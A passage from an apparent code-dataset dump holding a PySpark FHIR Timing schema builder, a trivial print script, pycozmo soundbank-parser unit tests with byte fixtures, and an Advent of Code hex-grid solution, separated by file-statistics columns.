governance applied to the definition and use of extensions. Though any
implementer can define an extension, there is a set of requirements that SHALL
be met as part of the definition of the extension. Applications processing a
resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
boundsDuration: Either a duration for the length of the timing schedule, a range of possible
length, or outer bounds for start and/or end limits of the timing schedule.
boundsRange: Either a duration for the length of the timing schedule, a range of possible
length, or outer bounds for start and/or end limits of the timing schedule.
boundsPeriod: Either a duration for the length of the timing schedule, a range of possible
length, or outer bounds for start and/or end limits of the timing schedule.
count: A total count of the desired number of repetitions across the duration of the
entire timing specification. If countMax is present, this element indicates
the lower bound of the allowed range of count values.
countMax: If present, indicates that the count is a range - so to perform the action
between [count] and [countMax] times.
duration: How long this thing happens for when it happens. If durationMax is present,
this element indicates the lower bound of the allowed range of the duration.
durationMax: If present, indicates that the duration is a range - so to perform the action
between [duration] and [durationMax] time length.
durationUnit: The units of time for the duration, in UCUM units.
frequency: The number of times to repeat the action within the specified period. If
frequencyMax is present, this element indicates the lower bound of the allowed
range of the frequency.
frequencyMax: If present, indicates that the frequency is a range - so to repeat between
[frequency] and [frequencyMax] times within the period or period range.
period: Indicates the duration of time over which repetitions are to occur; e.g. to
express "3 times per day", 3 would be the frequency and "1 day" would be the
period. If periodMax is present, this element indicates the lower bound of the
allowed range of the period length.
periodMax: If present, indicates that the period is a range from [period] to [periodMax],
allowing expressing concepts such as "do this once every 3-5 days.
periodUnit: The units of time for the period in UCUM units.
dayOfWeek: If one or more days of week is provided, then the action happens only on the
specified day(s).
timeOfDay: Specified time of day for action to take place.
when: An approximate time period during the day, potentially linked to an event of
daily living that indicates when the action should occur.
offset: The number of minutes from the event. If the event code does not indicate
whether the minutes is before or after the event, then the offset is assumed
to be after the event.
"""
if extension_fields is None:
extension_fields = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
"valueReference",
"valueCodeableConcept",
"valueAddress",
]
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.complex_types.duration import DurationSchema
from spark_fhir_schemas.r4.complex_types.range import RangeSchema
from spark_fhir_schemas.r4.complex_types.period import PeriodSchema
from spark_fhir_schemas.r4.simple_types.positiveint import positiveIntSchema
from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
from spark_fhir_schemas.r4.simple_types.code import codeSchema
from spark_fhir_schemas.r4.simple_types.time import timeSchema
from spark_fhir_schemas.r4.simple_types.unsignedint import unsignedIntSchema
if (
max_recursion_limit
and nesting_list.count("Timing_Repeat") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["Timing_Repeat"]
my_parent_path = (
parent_path + ".timing_repeat" if parent_path else "timing_repeat"
)
schema = StructType(
[
# Unique id for the element within a resource (for internal references). This
# may be any string value that does not contain spaces.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the element. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the element and that modifies the understanding of the element
# in which it is contained and/or the understanding of the containing element's
# descendants. Usually modifier elements provide negation or qualification. To
# make the use of extensions safe and manageable, there is a strict set of
# governance applied to the definition and use of extensions. Though any
# implementer can define an extension, there is a set of requirements that SHALL
# be met as part of the definition of the extension. Applications processing a
# resource are required to check for modifier extensions.
#
# Modifier extensions SHALL NOT change the meaning of any elements on Resource
# or DomainResource (including cannot change the meaning of modifierExtension
# itself).
StructField(
"modifierExtension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Either a duration for the length of the timing schedule, a range of possible
# length, or outer bounds for start and/or end limits of the timing schedule.
StructField(
"boundsDuration",
DurationSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Either a duration for the length of the timing schedule, a range of possible
# length, or outer bounds for start and/or end limits of the timing schedule.
StructField(
"boundsRange",
RangeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Either a duration for the length of the timing schedule, a range of possible
# length, or outer bounds for start and/or end limits of the timing schedule.
StructField(
"boundsPeriod",
PeriodSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# A total count of the desired number of repetitions across the duration of the
# entire timing specification. If countMax is present, this element indicates
# the lower bound of the allowed range of count values.
StructField(
"count",
positiveIntSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".count",
),
True,
),
# If present, indicates that the count is a range - so to perform the action
# between [count] and [countMax] times.
StructField(
"countMax",
positiveIntSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".countmax",
),
True,
),
# How long this thing happens for when it happens. If durationMax is present,
# this element indicates the lower bound of the allowed range of the duration.
StructField(
"duration",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".duration",
),
True,
),
# If present, indicates that the duration is a range - so to perform the action
# between [duration] and [durationMax] time length.
StructField(
"durationMax",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".durationmax",
),
True,
),
# The units of time for the duration, in UCUM units.
StructField("durationUnit", StringType(), True),
# The number of times to repeat the action within the specified period. If
# frequencyMax is present, this element indicates the lower bound of the allowed
# range of the frequency.
StructField(
"frequency",
positiveIntSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".frequency",
),
True,
),
# If present, indicates that the frequency is a range - so to repeat between
# [frequency] and [frequencyMax] times within the period or period range.
StructField(
"frequencyMax",
positiveIntSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".frequencymax",
),
True,
),
# Indicates the duration of time over which repetitions are to occur; e.g. to
# express "3 times per day", 3 would be the frequency and "1 day" would be the
# period. If periodMax is present, this element indicates the lower bound of the
# allowed range of the period length.
StructField(
"period",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".period",
),
True,
),
# If present, indicates that the period is a range from [period] to [periodMax],
# allowing expressing concepts such as "do this once every 3-5 days.
StructField(
"periodMax",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".periodmax",
),
True,
),
# The units of time for the period in UCUM units.
StructField("periodUnit", StringType(), True),
# If one or more days of week is provided, then the action happens only on the
# specified day(s).
StructField(
"dayOfWeek",
ArrayType(
codeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Specified time of day for action to take place.
StructField(
"timeOfDay",
ArrayType(
timeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# An approximate time period during the day, potentially linked to an event of
# daily living that indicates when the action should occur.
# The number of minutes from the event. If the event code does not indicate
# whether the minutes is before or after the event, then the offset is assumed
# to be after the event.
StructField(
"offset",
unsignedIntSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".offset",
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 53.228682
| 104
| 0.561567
| 2,732
| 27,466
| 5.426794
| 0.108346
| 0.055848
| 0.035411
| 0.051801
| 0.851275
| 0.847835
| 0.844058
| 0.818899
| 0.818899
| 0.813773
| 0
| 0.003195
| 0.395944
| 27,466
| 515
| 105
| 53.332039
| 0.890423
| 0.315008
| 0
| 0.699438
| 1
| 0
| 0.030559
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002809
| false
| 0
| 0.030899
| 0
| 0.042135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b29e9bed686b2a45f86be3103e7229ebf10ea542
| 257
|
py
|
Python
|
concept-of-slicing/slice.py
|
anmolpal1999/python-for-beginners
|
738d73006cf21206cd10ea89d9796669fc141df3
|
[
"MIT"
] | null | null | null |
concept-of-slicing/slice.py
|
anmolpal1999/python-for-beginners
|
738d73006cf21206cd10ea89d9796669fc141df3
|
[
"MIT"
] | null | null | null |
concept-of-slicing/slice.py
|
anmolpal1999/python-for-beginners
|
738d73006cf21206cd10ea89d9796669fc141df3
|
[
"MIT"
] | null | null | null |
print('-------------------------------------------------------------------------')
family=["Me","sis","Papa","Mummy","Chacha"]
print(family[1:1])
print('thank you')
print('-------------------------------------------------------------------------')
| 42.833333
| 83
| 0.241245
| 15
| 257
| 4.133333
| 0.666667
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 0.058366
| 257
| 5
| 84
| 51.4
| 0.247934
| 0
| 0
| 0.4
| 0
| 0
| 0.694444
| 0.579365
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.8
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
a25af66237a375812d2e3bbf336a14a282bfa0b0
| 6,212
|
py
|
Python
|
pycozmo/audiokinetic/tests/test_soundbank.py
|
nalbion/pycozmo
|
35ee1ea741ecf7a39affc38d4ff5ad17865fea16
|
[
"MIT"
] | 123
|
2019-08-25T21:28:23.000Z
|
2022-03-12T13:54:59.000Z
|
pycozmo/audiokinetic/tests/test_soundbank.py
|
nalbion/pycozmo
|
35ee1ea741ecf7a39affc38d4ff5ad17865fea16
|
[
"MIT"
] | 41
|
2019-08-25T21:21:37.000Z
|
2022-02-09T14:20:54.000Z
|
pycozmo/audiokinetic/tests/test_soundbank.py
|
nalbion/pycozmo
|
35ee1ea741ecf7a39affc38d4ff5ad17865fea16
|
[
"MIT"
] | 51
|
2019-09-04T13:30:02.000Z
|
2022-01-09T01:20:24.000Z
|
import unittest
import io
import pycozmo
class TestLoadSoundBank(unittest.TestCase):
def test_invalid(self):
f = io.BytesIO(b"")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticIOError):
reader.load_file(f, "test")
def test_invalid2(self):
f = io.BytesIO(b"ZZZZZZZZ")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticFormatError):
reader.load_file(f, "test")
def test_empty(self):
f = io.BytesIO(b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(soundbank.fspec, "test")
self.assertEqual(soundbank.id, 0x44332211)
self.assertEqual(soundbank.name, "")
self.assertEqual(soundbank.version, 120)
self.assertEqual(soundbank.data_offset, -1)
self.assertEqual(len(soundbank.objs), 0)
def test_data_section(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"DATA\0\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(soundbank.data_offset, f.tell())
def test_data_index_empty(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"DIDX\0\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(len(soundbank.objs), 0)
def test_data_index_invalid(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"DIDX\xff\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticIOError):
reader.load_file(f, "test")
def test_data_index(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"DIDX\x0c\0\0\0\x01\0\0\0\x02\0\0\0\x03\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(len(soundbank.objs), 1)
file = soundbank.objs[1]
self.assertIsInstance(file, pycozmo.audiokinetic.soundbank.File)
self.assertEqual(file.soundbank_id, soundbank.id)
self.assertEqual(file.id, 1)
self.assertEqual(file.offset, 2)
self.assertEqual(file.length, 3)
def test_hirc_empty(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"HIRC\x04\0\0\0\0\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(len(soundbank.objs), 0)
def test_hirc_invalid(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"HIRC\xff\0\0\0\xff\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticIOError):
reader.load_file(f, "test")
def test_event(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"HIRC\x15\0\0\0\x01\0\0\0\x04\x0c\0\0\0\x01\0\0\0\x01\0\0\0\x02\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(len(soundbank.objs), 1)
event = soundbank.objs[1]
self.assertIsInstance(event, pycozmo.audiokinetic.soundbank.Event)
self.assertEqual(event.soundbank_id, soundbank.id)
self.assertEqual(event.id, 1)
self.assertEqual(event.name, "")
self.assertEqual(len(event.action_ids), 1)
self.assertEqual(event.action_ids[0], 2)
def test_event_action(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"HIRC\x14\0\0\0\x01\0\0\0\x03\x0b\0\0\0\x01\0\0\0\x03\x04\xdd\xcc\xbb\xaa\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(len(soundbank.objs), 1)
event_action = soundbank.objs[1]
self.assertIsInstance(event_action, pycozmo.audiokinetic.soundbank.EventAction)
self.assertEqual(event_action.soundbank_id, soundbank.id)
self.assertEqual(event_action.id, 1)
self.assertEqual(event_action.scope, 3)
self.assertEqual(event_action.type, 4)
self.assertEqual(event_action.reference_id, 0xaabbccdd)
def test_sfx(self):
f = io.BytesIO(
b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
b"HIRC\x1e\0\0\0\x01\0\0\0\x02\x15\0\0\0\x01\0\0\0\x01\0\0\0\x02\x03\0\0\0\x04\0\0\0\x01\0\0\0")
reader = pycozmo.audiokinetic.soundbank.SoundBankReader({})
soundbank = reader.load_file(f, "test")
self.assertEqual(len(soundbank.objs), 1)
event_action = soundbank.objs[1]
self.assertIsInstance(event_action, pycozmo.audiokinetic.soundbank.SFX)
self.assertEqual(event_action.soundbank_id, soundbank.id)
self.assertEqual(event_action.id, 1)
self.assertEqual(event_action.name, "")
self.assertEqual(event_action.location, 2)
self.assertEqual(event_action.file_id, 3)
self.assertEqual(event_action.length, 4)
self.assertEqual(event_action.type, 1)
| 46.706767
| 119
| 0.633129
| 1,038
| 6,212
| 3.732177
| 0.080925
| 0.155911
| 0.181208
| 0.171399
| 0.819566
| 0.75271
| 0.727414
| 0.708312
| 0.693598
| 0.681466
| 0
| 0.121152
| 0.194784
| 6,212
| 132
| 120
| 47.060606
| 0.653339
| 0
| 0
| 0.5
| 0
| 0.12069
| 0.216068
| 0.20029
| 0
| 0
| 0.00322
| 0
| 0.362069
| 1
| 0.103448
| false
| 0
| 0.025862
| 0
| 0.137931
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a26d42f799f99e7095be3f0c3901520eec0d8829
| 24,371
|
py
|
Python
|
11/solution.py
|
AlecRosenbaum/adventofcode2017
|
9214a64db77492790d30bbd22e835535d05abb25
|
[
"MIT"
] | null | null | null |
11/solution.py
|
AlecRosenbaum/adventofcode2017
|
9214a64db77492790d30bbd22e835535d05abb25
|
[
"MIT"
] | null | null | null |
11/solution.py
|
AlecRosenbaum/adventofcode2017
|
9214a64db77492790d30bbd22e835535d05abb25
|
[
"MIT"
] | null | null | null |
"""
Day 11 challenge
"""
import attr
import math
from functools import reduce
@attr.s
class Offset(object):
horizontal = attr.ib(default=0)
vertical = attr.ib(default=0)
def __add__(self, other):
return Offset(
horizontal=self.horizontal + other.horizontal,
vertical=self.vertical + other.vertical,
)
def absolute_offset(self):
return math.sqrt(abs(self.horizontal)**2 + abs(self.vertical)**2)
DIRECTIONS = {
"nw": Offset(horizontal=-.5, vertical=.5),
"n": Offset(vertical=1),
"ne": Offset(horizontal=.5, vertical=.5),
"se": Offset(horizontal=.5, vertical=-.5),
"s": Offset(vertical=-1),
"sw": Offset(horizontal=-.5, vertical=-.5),
}
def solution_part_one(arg):
steps = list(map(DIRECTIONS.get, arg.split(",")))
effective_offset = sum(steps, Offset())
fast_path = []
while effective_offset.absolute_offset():
curr_dir = None
curr_abs_offset = None
for k, v in DIRECTIONS.items():
abs_offset = (effective_offset + v).absolute_offset()
if not curr_dir or abs_offset < curr_abs_offset:
curr_dir = k
curr_abs_offset = abs_offset
effective_offset += DIRECTIONS[curr_dir]
fast_path.append(curr_dir)
return len(fast_path)
def solution_part_two(arg):
steps = list(map(DIRECTIONS.get, arg.split(",")))
def get_fast_path(effective_offset):
fast_path = []
while effective_offset.absolute_offset():
curr_dir = None
curr_abs_offset = None
for k, v in DIRECTIONS.items():
abs_offset = (effective_offset + v).absolute_offset()
if not curr_dir or abs_offset < curr_abs_offset:
curr_dir = k
curr_abs_offset = abs_offset
effective_offset += DIRECTIONS[curr_dir]
fast_path.append(curr_dir)
return fast_path
return max(
map(len,
map(
get_fast_path,
reduce(
lambda agg, x: agg + [agg[-1] + x],
steps[1:],
[steps[0]],
),
),
),
)
if __name__ == "__main__":
puzzle_input = """s,s,sw,se,s,nw,nw,ne,n,ne,n,n,n,n,n,n,n,ne,n,ne,ne,se,ne,n,ne,n,n,ne,se,sw,se,s,se,se,se,se,s,se,se,s,se,se,nw,se,se,se,s,s,nw,s,s,se,nw,s,n,s,nw,s,s,s,s,s,s,s,s,s,s,s,sw,s,s,s,s,s,sw,sw,s,sw,s,nw,sw,sw,s,sw,ne,sw,sw,s,se,sw,sw,sw,sw,sw,sw,sw,nw,sw,sw,sw,se,sw,nw,nw,sw,sw,sw,s,sw,nw,se,nw,se,nw,sw,nw,nw,se,n,sw,s,s,s,nw,sw,sw,nw,se,nw,sw,sw,sw,nw,sw,sw,nw,nw,nw,nw,ne,n,nw,nw,ne,nw,nw,nw,nw,nw,se,nw,nw,n,nw,nw,nw,sw,n,nw,nw,nw,nw,n,s,nw,ne,nw,s,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,s,sw,n,n,nw,nw,n,n,nw,nw,n,nw,n,n,nw,n,s,n,nw,ne,n,nw,n,nw,n,n,n,n,se,s,n,s,n,s,n,n,n,nw,n,s,n,n,n,n,n,ne,n,n,n,n,s,n,n,n,n,sw,n,n,n,nw,n,n,n,n,nw,se,n,ne,n,n,ne,n,ne,ne,n,n,n,n,ne,n,n,nw,n,n,n,n,ne,se,se,ne,ne,ne,n,ne,n,ne,ne,nw,ne,ne,n,n,n,ne,ne,ne,n,ne,nw,n,s,ne,ne,ne,ne,ne,n,s,ne,ne,ne,n,ne,ne,ne,sw,ne,ne,ne,s,n,ne,ne,n,ne,ne,ne,ne,ne,se,ne,ne,se,ne,ne,ne,ne,se,ne,se,ne,nw,nw,sw,s,n,ne,ne,ne,ne,ne,sw,ne,ne,ne,sw,ne,ne,ne,ne,sw,se,ne,ne,ne,ne,se,s,se,s,nw,ne,ne,n,se,ne,ne,ne,sw,ne,s,s,nw,se,nw,ne,s,ne,se,ne,n,ne,n,s,n,ne,ne,s,ne,se,se,ne,sw,nw,s,n,nw,n,se,ne,se,se,sw,ne,ne,sw,se,se,se,se,sw,ne,se,s,ne,ne,n,se,ne,sw,ne,ne,se,se,nw,se,ne,ne,nw,sw,se,s,s,se,se,se,s,se,nw,se,ne,se,se,se,se,se,se,se,sw,nw,se,se,se,se,se,se,sw,se,sw,ne,se,se,se,se,se,se,se,se,s,se,se,se,se,se,se,ne,se,se,s,sw,s,se,se,se,se,se,se,se,s,se,sw,se,se,n,s,se,s,ne,se,se,se,s,se,s,se,se,ne,se,se,sw,s,se,se,se,se,nw,se,n,ne,s,s,nw,se,se,s,se,n,se,se,s,se,se,s,se,se,ne,se,se,se,s,s,sw,s,s,se,s,se,s,se,s,se,se,se,s,se,s,nw,s,s,se,se,se,se,sw,sw,s,se,s,se,se,s,n,se,se,se,se,s,se,se,s,se,se,se,sw,s,s,s,se,se,s,s,se,s,s,se,s,s,n,s,nw,s,n,s,sw,s,nw,s,s,se,se,sw,s,s,s,sw,se,s,n,s,se,n,s,se,se,se,s,s,s,se,ne,s,se,n,se,s,se,se,s,ne,sw,se,s,s,se,s,s,s,s,s,s,s,s,se,s,nw,s,s,s,s,s,s,s,s,s,s,s,ne,ne,s,s,s,s,s,s,s,s,s,ne,ne,s,s,s,s,s,s,s,s,nw,s,s,se,sw,s,sw,s,s,nw,s,s,s,s,s,s,s,s,s,n,ne,se,s,s,s,s,n,se,s,sw,s,sw,sw,sw,s,s,sw,s,s,s,nw,sw,s,s,s,s,s,ne,sw,s,s,sw,s,s,s,s,s,s,sw,s,s,se,s,s,sw,n,sw,s,s,sw,s,s,s,s,s,sw,s,ne,s,s,s,s,sw,ne,s,ne,n,sw,s,s,s,sw,s,sw,nw,s,s,ne,sw,sw,nw,s,s,sw,sw,s,ne,s,s,sw,se,s,s,sw,s,s,sw,s,sw,sw,s,s,s,s,sw,sw,sw,s,n,ne,s,ne,s,sw,s,se,s,sw,sw,s,sw,sw,sw,sw,s,s,s,s,se,s,sw,sw,sw,sw,n,s,sw,s,s,sw,sw,s,s,n,sw,s,sw,sw,ne,sw,sw,s,sw,sw,sw,sw,sw,s,s,sw,se,sw,sw,sw,sw,s,s,sw,s,sw,sw,nw,sw,sw,se,sw,s,s,nw,nw,s,s,sw,sw,s,n,s,sw,sw,se,s,sw,sw,ne,sw,sw,sw,sw,sw,ne,sw,s,sw,sw,n,sw,sw,sw,sw,s,sw,sw,sw,sw,sw,n,nw,s,sw,s,s,n,ne,sw,sw,sw,sw,n,sw,se,sw,sw,s,se,sw,sw,sw,sw,sw,sw,s,ne,ne,ne,sw,sw,sw,ne,s,sw,sw,sw,sw,nw,s,sw,sw,s,s,sw,sw,n,nw,nw,sw,sw,sw,se,nw,nw,sw,s,sw,sw,sw,sw,sw,sw,sw,sw,sw,n,sw,sw,sw,nw,nw,se,sw,sw,sw,sw,sw,ne,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,nw,s,sw,sw,se,